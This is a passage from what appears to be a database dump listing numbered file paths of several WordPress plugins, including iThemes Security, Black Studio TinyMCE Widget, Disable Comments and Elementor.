p-security/core/modules/ssl/active.php'),(1711,'wp-content/plugins/better-wp-security/core/modules/ssl/class-itsec-ssl-admin.php'),(1712,'wp-content/plugins/better-wp-security/core/modules/ssl/class-itsec-ssl.php'),(1713,'wp-content/plugins/better-wp-security/core/modules/ssl/deactivate.php'),(1714,'wp-content/plugins/better-wp-security/core/modules/ssl/index.php'),(1715,'wp-content/plugins/better-wp-security/core/modules/ssl/js/block-editor.js'),(1716,'wp-content/plugins/better-wp-security/core/modules/ssl/js/index.php'),(1717,'wp-content/plugins/better-wp-security/core/modules/ssl/js/settings-page.js'),(1718,'wp-content/plugins/better-wp-security/core/modules/ssl/settings-page.php'),(1719,'wp-content/plugins/better-wp-security/core/modules/ssl/settings.php'),(1720,'wp-content/plugins/better-wp-security/core/modules/ssl/setup.php'),(1721,'wp-content/plugins/better-wp-security/core/modules/ssl/validator.php'),(1722,'wp-content/plugins/better-wp-security/core/modules/strong-passwords/active.php'),(1723,'wp-content/plugins/better-wp-security/core/modules/strong-passwords/class-itsec-strong-passwords.php'),(1724,'wp-content/plugins/better-wp-security/core/modules/strong-passwords/index.php'),(1725,'wp-content/plugins/better-wp-security/core/modules/strong-passwords/js/index.php'),(1726,'wp-content/plugins/better-wp-security/core/modules/strong-passwords/js/script.js'),(1727,'wp-content/plugins/better-wp-security/core/modules/strong-passwords/settings.php'),(1728,'wp-content/plugins/better-wp-security/core/modules/strong-passwords/setup.php'),(1729,'wp-content/plugins/better-wp-security/core/modules/strong-passwords/validator.php'),(1730,'wp-content/plugins/better-wp-security/core/modules/system-tweaks/activate.php'),(1731,'wp-content/plugins/better-wp-security/core/modules/system-tweaks/active.php'),(1732,'wp-content/plugins/better-wp-security/core/modules/system-tweaks/class-itsec-system-tweaks.php'),(1733,'wp-content/plugins/better-wp-security/core/modules/system-tweaks/config-generators.php'),(1734,'wp-content/plugins/better-wp-security/core/modules/system-tweaks/deactivate.php'),(1735,'wp-content/plugins/better-wp-security/core/modules/system-tweaks/index.php'),(1736,'wp-content/plugins/better-wp-security/core/modules/system-tweaks/settings-page.php'),(1737,'wp-content/plugins/better-wp-security/core/modules/system-tweaks/settings.php'),(1738,'wp-content/plugins/better-wp-security/core/modules/system-tweaks/setup.php'),(1739,'wp-content/plugins/better-wp-security/core/modules/system-tweaks/validator.php'),(1740,'wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/activate.php'),(1741,'wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/active.php'),(1742,'wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/class-itsec-wordpress-tweaks.php'),(1743,'wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/config-generators.php'),(1744,'wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/deactivate.php'),(1745,'wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/index.php'),(1746,'wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/js/blankshield/LICENSE'),(1747,'wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/js/blankshield/blankshield.min.js'),(1748,'wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/js/blankshield/index.php'),(1749,'wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/js/block-tabnapping.js'),(1750,'wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/js/block-tabnapping.min.js'),(1751,'wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/js/index.php'),(1752,'wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/settings-page.php'),(1753,'wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/settings.php'),(1754,'wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/setup.php'),(1755,'wp-content/plugins/better-wp-security/core/modules/wordpress-tweaks/validator.php'),(1756,'wp-content/plugins/better-wp-security/core/modules.php'),(1757,'wp-content/plugins/better-wp-security/core/notify.php'),(1758,'wp-content/plugins/better-wp-security/core/package.json'),(1759,'wp-content/plugins/better-wp-security/core/packages/components/index.php'),(1760,'wp-content/plugins/better-wp-security/core/packages/components/src/async-select/index.js'),(1761,'wp-content/plugins/better-wp-security/core/packages/components/src/async-select/index.php'),(1762,'wp-content/plugins/better-wp-security/core/packages/components/src/close-button/index.js'),(1763,'wp-content/plugins/better-wp-security/core/packages/components/src/close-button/index.php'),(1764,'wp-content/plugins/better-wp-security/core/packages/components/src/close-button/style.scss'),(1765,'wp-content/plugins/better-wp-security/core/packages/components/src/hover-detector/index.js'),(1766,'wp-content/plugins/better-wp-security/core/packages/components/src/hover-detector/index.php'),(1767,'wp-content/plugins/better-wp-security/core/packages/components/src/index.js'),(1768,'wp-content/plugins/better-wp-security/core/packages/components/src/index.php'),(1769,'wp-content/plugins/better-wp-security/core/packages/components/src/loader/icon.svg'),(1770,'wp-content/plugins/better-wp-security/core/packages/components/src/loader/index.js'),(1771,'wp-content/plugins/better-wp-security/core/packages/components/src/loader/index.php'),(1772,'wp-content/plugins/better-wp-security/core/packages/components/src/loader/logo.svg'),(1773,'wp-content/plugins/better-wp-security/core/packages/components/src/loader/style.scss'),(1774,'wp-content/plugins/better-wp-security/core/packages/components/src/log-modal/index.js'),(1775,'wp-content/plugins/better-wp-security/core/packages/components/src/log-modal/index.php'),(1776,'wp-content/plugins/better-wp-security/core/packages/components/src/log-modal/style.scss'),(1777,'wp-content/plugins/better-wp-security/core/packages/components/src/malware-scan-results/blacklist-details.js'),(1778,'wp-content/plugins/better-wp-security/core/packages/components/src/malware-scan-results/index.js'),(1779,'wp-content/plugins/better-wp-security/core/packages/components/src/malware-scan-results/index.php'),(1780,'wp-content/plugins/better-wp-security/core/packages/components/src/malware-scan-results/malware-details.js'),(1781,'wp-content/plugins/better-wp-security/core/packages/components/src/malware-scan-results/style.scss'),(1782,'wp-content/plugins/better-wp-security/core/packages/components/src/malware-scan-results/system-error-details.js'),(1783,'wp-content/plugins/better-wp-security/core/packages/components/src/malware-scan-results/wp-error-details.js'),(1784,'wp-content/plugins/better-wp-security/core/packages/components/src/malware-scan-results/wrapped-section.js'),(1785,'wp-content/plugins/better-wp-security/core/packages/components/src/print-r/index.js'),(1786,'wp-content/plugins/better-wp-security/core/packages/components/src/print-r/index.php'),(1787,'wp-content/plugins/better-wp-security/core/packages/components/src/print-r/style.scss'),(1788,'wp-content/plugins/better-wp-security/core/packages/components/src/site-scan-results/blacklist-details.js'),(1789,'wp-content/plugins/better-wp-security/core/packages/components/src/site-scan-results/detail.js'),(1790,'wp-content/plugins/better-wp-security/core/packages/components/src/site-scan-results/details.js'),(1791,'wp-content/plugins/better-wp-security/core/packages/components/src/site-scan-results/index.js'),(1792,'wp-content/plugins/better-wp-security/core/packages/components/src/site-scan-results/index.php'),(1793,'wp-content/plugins/better-wp-security/core/packages/components/src/site-scan-results/known-vulnerabilities.js'),(1794,'wp-content/plugins/better-wp-security/core/packages/components/src/site-scan-results/malware-details.js'),(1795,'wp-content/plugins/better-wp-security/core/packages/components/src/site-scan-results/style.scss'),(1796,'wp-content/plugins/better-wp-security/core/packages/components/src/site-scan-results/system-error-details.js'),(1797,'wp-content/plugins/better-wp-security/core/packages/components/src/site-scan-results/wp-error-details.js'),(1798,'wp-content/plugins/better-wp-security/core/packages/components/src/site-scan-results/wrapped-section.js'),(1799,'wp-content/plugins/better-wp-security/core/packages/hocs/index.php'),(1800,'wp-content/plugins/better-wp-security/core/packages/hocs/src/index.js'),(1801,'wp-content/plugins/better-wp-security/core/packages/hocs/src/index.php'),(1802,'wp-content/plugins/better-wp-security/core/packages/hocs/src/with-debounce-handler.js'),(1803,'wp-content/plugins/better-wp-security/core/packages/hocs/src/with-interval.js'),(1804,'wp-content/plugins/better-wp-security/core/packages/hocs/src/with-prop-change-callback.js'),(1805,'wp-content/plugins/better-wp-security/core/packages/hocs/src/with-props.js'),(1806,'wp-content/plugins/better-wp-security/core/packages/hocs/src/with-width.js'),(1807,'wp-content/plugins/better-wp-security/core/packages/index.php'),(1808,'wp-content/plugins/better-wp-security/core/packages/style-guide/index.php'),(1809,'wp-content/plugins/better-wp-security/core/packages/style-guide/src/animations.scss'),(1810,'wp-content/plugins/better-wp-security/core/packages/style-guide/src/breakpoints.scss'),(1811,'wp-content/plugins/better-wp-security/core/packages/style-guide/src/colors.js'),(1812,'wp-content/plugins/better-wp-security/core/packages/style-guide/src/colors.scss'),(1813,'wp-content/plugins/better-wp-security/core/packages/style-guide/src/index.js'),(1814,'wp-content/plugins/better-wp-security/core/packages/style-guide/src/index.php'),(1815,'wp-content/plugins/better-wp-security/core/packages/style-guide/src/mixins.scss'),(1816,'wp-content/plugins/better-wp-security/core/packages/utils/index.php'),(1817,'wp-content/plugins/better-wp-security/core/packages/utils/src/error-response.js'),(1818,'wp-content/plugins/better-wp-security/core/packages/utils/src/index.js'),(1819,'wp-content/plugins/better-wp-security/core/packages/utils/src/index.php'),(1820,'wp-content/plugins/better-wp-security/core/packages/utils/src/test/index.js'),(1821,'wp-content/plugins/better-wp-security/core/packages/utils/src/test/index.php'),(1822,'wp-content/plugins/better-wp-security/core/packages/utils/src/wp-error.js'),(1823,'wp-content/plugins/better-wp-security/core/packages/webpack/index.php'),(1824,'wp-content/plugins/better-wp-security/core/packages/webpack/src/babel.js'),(1825,'wp-content/plugins/better-wp-security/core/packages/webpack/src/config/index.js'),(1826,'wp-content/plugins/better-wp-security/core/packages/webpack/src/config/index.php'),(1827,'wp-content/plugins/better-wp-security/core/packages/webpack/src/custom-templated-path-webpack-plugin/index.js'),(1828,'wp-content/plugins/better-wp-security/core/packages/webpack/src/custom-templated-path-webpack-plugin/index.php'),(1829,'wp-content/plugins/better-wp-security/core/packages/webpack/src/dynamic-public-path/index.js'),(1830,'wp-content/plugins/better-wp-security/core/packages/webpack/src/dynamic-public-path/index.php'),(1831,'wp-content/plugins/better-wp-security/core/packages/webpack/src/dynamic-public-path/loader.js'),(1832,'wp-content/plugins/better-wp-security/core/packages/webpack/src/index.php'),(1833,'wp-content/plugins/better-wp-security/core/packages/webpack/src/manifest/index.js'),(1834,'wp-content/plugins/better-wp-security/core/packages/webpack/src/manifest/index.php'),(1835,'wp-content/plugins/better-wp-security/core/packages/webpack/src/manifest/json-to-php.php'),(1836,'wp-content/plugins/better-wp-security/core/packages/webpack/src/split-chunk-name/index.js'),(1837,'wp-content/plugins/better-wp-security/core/packages/webpack/src/split-chunk-name/index.php'),(1838,'wp-content/plugins/better-wp-security/core/packages/webpack/src/style-only-entry-plugin/index.js'),(1839,'wp-content/plugins/better-wp-security/core/packages/webpack/src/style-only-entry-plugin/index.php'),(1840,'wp-content/plugins/better-wp-security/core/packages/webpack/src/wp-externals/index.js'),(1841,'wp-content/plugins/better-wp-security/core/packages/webpack/src/wp-externals/index.php'),(1842,'wp-content/plugins/better-wp-security/core/response.php'),(1843,'wp-content/plugins/better-wp-security/core/setup.php'),(1844,'wp-content/plugins/better-wp-security/core/show-multiple-version-notice.php'),(1845,'wp-content/plugins/better-wp-security/core/sidebar-widget-active-lockouts.php'),(1846,'wp-content/plugins/better-wp-security/core/sidebar-widget-temp-whitelist.php'),(1847,'wp-content/plugins/better-wp-security/core/sync-verbs/index.php'),(1848,'wp-content/plugins/better-wp-security/core/sync-verbs/itsec-get-everything.php'),(1849,'wp-content/plugins/better-wp-security/core/sync-verbs/itsec-get-lockouts.php'),(1850,'wp-content/plugins/better-wp-security/core/sync-verbs/itsec-get-temp-whitelist.php'),(1851,'wp-content/plugins/better-wp-security/core/sync-verbs/itsec-release-lockout.php'),(1852,'wp-content/plugins/better-wp-security/core/sync-verbs/itsec-set-temp-whitelist.php'),(1853,'wp-content/plugins/better-wp-security/dist/core/admin-notices-api.min.js'),(1854,'wp-content/plugins/better-wp-security/dist/core/admin-notices-dashboard-admin-bar.min.css'),(1855,'wp-content/plugins/better-wp-security/dist/core/admin-notices-dashboard-admin-bar.min.js'),(1856,'wp-content/plugins/better-wp-security/dist/core/admin-notices.min.css'),(1857,'wp-content/plugins/better-wp-security/dist/core/admin-notices.min.js'),(1858,'wp-content/plugins/better-wp-security/dist/core/index.php'),(1859,'wp-content/plugins/better-wp-security/dist/core/packages/components/index.php'),(1860,'wp-content/plugins/better-wp-security/dist/core/packages/components/site-scan-results/index.php'),(1861,'wp-content/plugins/better-wp-security/dist/core/packages/components/site-scan-results/style.min.css'),(1862,'wp-content/plugins/better-wp-security/dist/core/packages/index.php'),(1863,'wp-content/plugins/better-wp-security/dist/index.php'),(1864,'wp-content/plugins/better-wp-security/dist/manifest.php'),(1865,'wp-content/plugins/better-wp-security/history.txt'),(1866,'wp-content/plugins/better-wp-security/index.php'),(1867,'wp-content/plugins/better-wp-security/lib/icon-fonts/fonts/index.php'),(1868,'wp-content/plugins/better-wp-security/lib/icon-fonts/fonts/ithemes-icons.eot'),(1869,'wp-content/plugins/better-wp-security/lib/icon-fonts/fonts/ithemes-icons.svg'),(1870,'wp-content/plugins/better-wp-security/lib/icon-fonts/fonts/ithemes-icons.ttf'),(1871,'wp-content/plugins/better-wp-security/lib/icon-fonts/fonts/ithemes-icons.woff'),(1872,'wp-content/plugins/better-wp-security/lib/icon-fonts/history.txt'),(1873,'wp-content/plugins/better-wp-security/lib/icon-fonts/icon-fonts.css'),(1874,'wp-content/plugins/better-wp-security/lib/icon-fonts/index.php'),(1875,'wp-content/plugins/better-wp-security/lib/icon-fonts/init.php'),(1876,'wp-content/plugins/better-wp-security/lib/icon-fonts/load.php'),(1877,'wp-content/plugins/better-wp-security/lib/index.php'),(1878,'wp-content/plugins/better-wp-security/package.json'),(1879,'wp-content/plugins/better-wp-security/readme.txt'),(1880,'wp-content/plugins/better-wp-security/webpack.config.js'),(1881,'wp-content/plugins/black-studio-tinymce-widget/black-studio-tinymce-widget.php'),(1882,'wp-content/plugins/black-studio-tinymce-widget/css/black-studio-tinymce-widget-pre33.css'),(1883,'wp-content/plugins/black-studio-tinymce-widget/css/black-studio-tinymce-widget-pre33.min.css'),(1884,'wp-content/plugins/black-studio-tinymce-widget/css/black-studio-tinymce-widget.css'),(1885,'wp-content/plugins/black-studio-tinymce-widget/css/black-studio-tinymce-widget.min.css'),(1886,'wp-content/plugins/black-studio-tinymce-widget/includes/class-admin-pointer.php'),(1887,'wp-content/plugins/black-studio-tinymce-widget/includes/class-admin.php'),(1888,'wp-content/plugins/black-studio-tinymce-widget/includes/class-compatibility-plugins.php'),(1889,'wp-content/plugins/black-studio-tinymce-widget/includes/class-compatibility-wordpress.php'),(1890,'wp-content/plugins/black-studio-tinymce-widget/includes/class-compatibility.php'),(1891,'wp-content/plugins/black-studio-tinymce-widget/includes/class-text-filters.php'),(1892,'wp-content/plugins/black-studio-tinymce-widget/includes/class-widget.php'),(1893,'wp-content/plugins/black-studio-tinymce-widget/includes/deprecated.php'),(1894,'wp-content/plugins/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pointer.js'),(1895,'wp-content/plugins/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pointer.min.js'),(1896,'wp-content/plugins/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pre33.js'),(1897,'wp-content/plugins/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pre33.min.js'),(1898,'wp-content/plugins/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pre39.js'),(1899,'wp-content/plugins/black-studio-tinymce-widget/js/black-studio-tinymce-widget-pre39.min.js'),(1900,'wp-content/plugins/black-studio-tinymce-widget/js/black-studio-tinymce-widget-setup.js'),(1901,'wp-content/plugins/black-studio-tinymce-widget/js/black-studio-tinymce-widget-setup.min.js'),(1902,'wp-content/plugins/black-studio-tinymce-widget/js/black-studio-tinymce-widget.js'),(1903,'wp-content/plugins/black-studio-tinymce-widget/js/black-studio-tinymce-widget.min.js'),(1904,'wp-content/plugins/black-studio-tinymce-widget/js/wp-page-widget.js'),(1905,'wp-content/plugins/black-studio-tinymce-widget/js/wp-page-widget.min.js'),(1906,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-ca.mo'),(1907,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-ca.po'),(1908,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-cs_CZ.mo'),(1909,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-cs_CZ.po'),(1910,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-da_DK.mo'),(1911,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-da_DK.po'),(1912,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-de_DE.mo'),(1913,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-de_DE.po'),(1914,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-el.mo'),(1915,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-el.po'),(1916,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-en_GB.mo'),(1917,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-en_GB.po'),(1918,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-es_ES.mo'),(1919,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-es_ES.po'),(1920,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-es_MX.mo'),(1921,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-es_MX.po'),(1922,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-fa_IR.mo'),(1923,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-fa_IR.po'),(1924,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-fi.mo'),(1925,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-fi.po'),(1926,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-fr_FR.mo'),(1927,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-fr_FR.po'),(1928,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-id_ID.mo'),(1929,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-id_ID.po'),(1930,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-it_IT.mo'),(1931,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-it_IT.po'),(1932,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-ja.mo'),(1933,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-ja.po'),(1934,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-km.mo'),(1935,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-km.po'),(1936,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-ko_KR.mo'),(1937,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-ko_KR.po'),(1938,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-lt_LT.mo'),(1939,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-lt_LT.po'),(1940,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-nl_NL.mo'),(1941,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-nl_NL.po'),(1942,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-oc.mo'),(1943,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-oc.po'),(1944,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-pl_PL.mo'),(1945,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-pl_PL.po'),(1946,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-pt_BR.mo'),(1947,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-pt_BR.po'),(1948,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-pt_PT.mo'),(1949,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-pt_PT.po'),(1950,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-ro_RO.mo'),(1951,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-ro_RO.po'),(1952,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-ru_RU.mo'),(1953,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-ru_RU.po'),(1954,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-sk_SK.mo'),(1955,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-sk_SK.po'),(1956,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-sv_SE.mo'),(1957,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-sv_SE.po'),(1958,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-tr_TR.mo'),(1959,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-tr_TR.po'),(1960,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-uk.mo'),(1961,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-uk.po'),(1962,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-zh_CN.mo'),(1963,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget-zh_CN.po'),(1964,'wp-content/plugins/black-studio-tinymce-widget/languages/black-studio-tinymce-widget.pot'),(1965,'wp-content/plugins/black-studio-tinymce-widget/readme.txt'),(1966,'wp-content/plugins/classic-editor/LICENSE.md'),(1967,'wp-content/plugins/classic-editor/classic-editor.php'),(1968,'wp-content/plugins/classic-editor/js/block-editor-plugin.js'),(1969,'wp-content/plugins/classic-editor/readme.txt'),(1970,'wp-content/plugins/disable-comments/disable-comments.php'),(1971,'wp-content/plugins/disable-comments/includes/comments-template.php'),(1972,'wp-content/plugins/disable-comments/includes/settings-page.php'),(1973,'wp-content/plugins/disable-comments/includes/tools-page.php'),(1974,'wp-content/plugins/disable-comments/languages/disable-comments-de_DE.mo'),(1975,'wp-content/plugins/disable-comments/languages/disable-comments-de_DE.po'),(1976,'wp-content/plugins/disable-comments/languages/disable-comments-es_ES.mo'),(1977,'wp-content/plugins/disable-comments/languages/disable-comments-es_ES.po'),(1978,'wp-content/plugins/disable-comments/languages/disable-comments-fa_ir.mo'),(1979,'wp-content/plugins/disable-comments/languages/disable-comments-fa_ir.po'),(1980,'wp-content/plugins/disable-comments/languages/disable-comments-fr_FR.mo'),(1981,'wp-content/plugins/disable-comments/languages/disable-comments-fr_FR.po'),(1982,'wp-content/plugins/disable-comments/languages/disable-comments-id_ID.mo'),(1983,'wp-content/plugins/disable-comments/languages/disable-comments-id_ID.po'),(1984,'wp-content/plugins/disable-comments/languages/disable-comments-pl_PL.mo'),(1985,'wp-content/plugins/disable-comments/languages/disable-comments-pl_PL.po'),(1986,'wp-content/plugins/disable-comments/languages/disable-comments-pt_BR.mo'),(1987,'wp-content/plugins/disable-comments/languages/disable-comments-pt_BR.po'),(1988,'wp-content/plugins/disable-comments/languages/disable-comments-ru_RU.mo'),(1989,'wp-content/plugins/disable-comments/languages/disable-comments-ru_RU.po'),(1990,'wp-content/plugins/disable-comments/languages/disable-comments-vi.mo'),(1991,'wp-content/plugins/disable-comments/languages/disable-comments-vi.po'),(1992,'wp-content/plugins/disable-comments/languages/disable-comments-vi_VI.mo'),(1993,'wp-content/plugins/disable-comments/languages/disable-comments-vi_VI.po'),(1994,'wp-content/plugins/disable-comments/languages/disable-comments-zh_TW.mo'),(1995,'wp-content/plugins/disable-comments/languages/disable-comments-zh_TW.po'),(1996,'wp-content/plugins/disable-comments/languages/disable-comments.pot'),(1997,'wp-content/plugins/disable-comments/readme.txt'),(1998,'wp-content/plugins/disable-comments/uninstall.php'),(1999,'wp-content/plugins/disable-xml-rpc/disable-xml-rpc.php'),(2000,'wp-content/plugins/disable-xml-rpc/readme.txt'),(2001,'wp-content/plugins/disable-xml-rpc-pingback/disable-xml-rpc-pingback.php'),(2002,'wp-content/plugins/disable-xml-rpc-pingback/license.txt'),(2003,'wp-content/plugins/disable-xml-rpc-pingback/readme.txt'),(2004,'wp-content/plugins/elementor/assets/css/admin-rtl.css'),(2005,'wp-content/plugins/elementor/assets/css/admin-rtl.min.css'),(2006,'wp-content/plugins/elementor/assets/css/admin.css'),(2007,'wp-content/plugins/elementor/assets/css/admin.min.css'),(2008,'wp-content/plugins/elementor/assets/css/common-rtl.css'),(2009,'wp-content/plugins/elementor/assets/css/common-rtl.min.css'),(2010,'wp-content/plugins/elementor/assets/css/common.css'),(2011,'wp-content/plugins/elementor/assets/css/common.min.css'),(2012,'wp-content/plugins/elementor/assets/css/editor-preview-rtl.css'),(2013,'wp-content/plugins/elementor/assets/css/editor-preview-rtl.min.css'),(2014,'wp-content/plugins/elementor/assets/css/editor-preview.css'),(2015,'wp-content/plugins/elementor/assets/css/editor-preview.min.css'),(2016,'wp-content/plugins/elementor/assets/css/editor-rtl.css'),(2017,'wp-content/plugins/elementor/assets/css/editor-rtl.min.css'),(2018,'wp-content/plugins/elementor/assets/css/editor.css'),(2019,'wp-content/plugins/elementor/assets/css/editor.min.css'),(2020,'wp-content/plugins/elementor/assets/css/frontend-msie.css'),(2021,'wp-content/plugins/elementor/assets/css/frontend-msie.min.css'),(2022,'wp-content/plugins/elementor/assets/css/frontend-rtl.css'),(2023,'wp-content/plugins/elementor/assets/css/frontend-rtl.min.css'),(2024,'wp-content/plugins/elementor/assets/css/frontend.css'),(2025,'wp-content/plugins/elementor/assets/css/frontend.min.css'),(2026,'wp-content/plugins/elementor/assets/css/templates/frontend-rtl.css'),(2027,'wp-content/plugins/elementor/assets/css/templates/frontend-rtl.min.css'),(2028,'wp-content/plugins/elementor/assets/css/templates/frontend.css'),(2029,'wp-content/plugins/elementor/assets/css/templates/frontend.min.css'),(2030,'wp-content/plugins/elementor/assets/images/ajax-loader.gif'),(2031,'wp-content/plugins/elementor/assets/images/blur.png'),(2032,'wp-content/plugins/elementor/assets/images/contrast.png'),(2033,'wp-content/plugins/elementor/assets/images/logo-icon.png'),(2034,'wp-content/plugins/elementor/assets/images/logo-panel.svg'),(2035,'wp-content/plugins/elementor/assets/images/placeholder.png'),(2036,'wp-content/plugins/elementor/assets/js/admin-feedback.js'),(2037,'wp-content/plugins/elementor/assets/js/admin-feedback.min.js'),(2038,'wp-content/plugins/elementor/assets/js/admin.js'),(2039,'wp-content/plugins/elementor/assets/js/admin.min.js'),(2040,'wp-content/plugins/elementor/assets/js/common-modules.js'),(2041,'wp-content/plugins/elementor/assets/js/common-modules.min.js'),(2042,'wp-content/plugins/elementor/assets/js/common.js'),(2043,'wp-content/plugins/elementor/assets/js/common.min.js'),(2044,'wp-content/plugins/elementor/assets/js/editor-modules.js'),(2045,'wp-content/plugins/elementor/assets/js/editor-modules.min.js'),(2046,'wp-content/plugins/elementor/assets/js/editor.js'),(2047,'wp-content/plugins/elementor/assets/js/editor.min.js'),(2048,'wp-content/plugins/elementor/assets/js/frontend-modules.js'),(2049,'wp-content/plugins/elementor/assets/js/frontend-modules.min.js'),(2050,'wp-content/plugins/elementor/assets/js/frontend.js'),(2051,'wp-content/plugins/elementor/assets/js/frontend.min.js'),(2052,'wp-content/plugins/elementor/assets/js/gutenberg.js'),(2053,'wp-content/plugins/elementor/assets/js/gutenberg.min.js'),(2054,'wp-content/plugins/elementor/assets/js/new-template.js'),(2055,'wp-content/plugins/elementor/assets/js/new-template.min.js'),(2056,'wp-content/plugins/elementor/assets/lib/animate.css/animate-config.json'),(2057,'wp-content/plugins/elementor/assets/lib/animate.css/animate.css'),(2058,'wp-content/plugins/elementor/assets/lib/animate.css/animate.min.css'),(2059,'wp-content/plugins/elementor/assets/lib/animations/animations.min.css'),(2060,'wp-content/plugins/elementor/assets/lib/backbone/backbone.marionette.js'),(2061,'wp-content/plugins/elementor/assets/lib/backbone/backbone.marionette.min.js'),(2062,'wp-content/plugins/elementor/assets/lib/backbone/backbone.radio.js'),(2063,'wp-content/plugins/elementor/assets/lib/backbone/backbone.radio.min.js'),(2064,'wp-content/plugins/elementor/assets/lib/dialog/dialog.js'),(2065,'wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js'),(2066,'wp-content/plugins/elementor/assets/lib/e-select2/css/e-select2.css'),(2067,'wp-content/plugins/elementor/assets/lib/e-select2/css/e-select2.min.css'),(2068,'wp-content/plugins/elementor/assets/lib/e-select2/js/e-select2.full.js'),(2069,'wp-content/plugins/elementor/assets/lib/e-select2/js/e-select2.full.min.js'),(2070,'wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.css'),(2071,'wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css'),(2072,'wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot'),(2073,'wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg'),(2074,'wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf'),(2075,'wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff'),(2076,'wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2'),(2077,'wp-content/plugins/elementor/assets/lib/flatpickr/flatpickr.css'),(2078,'wp-content/plugins/elemento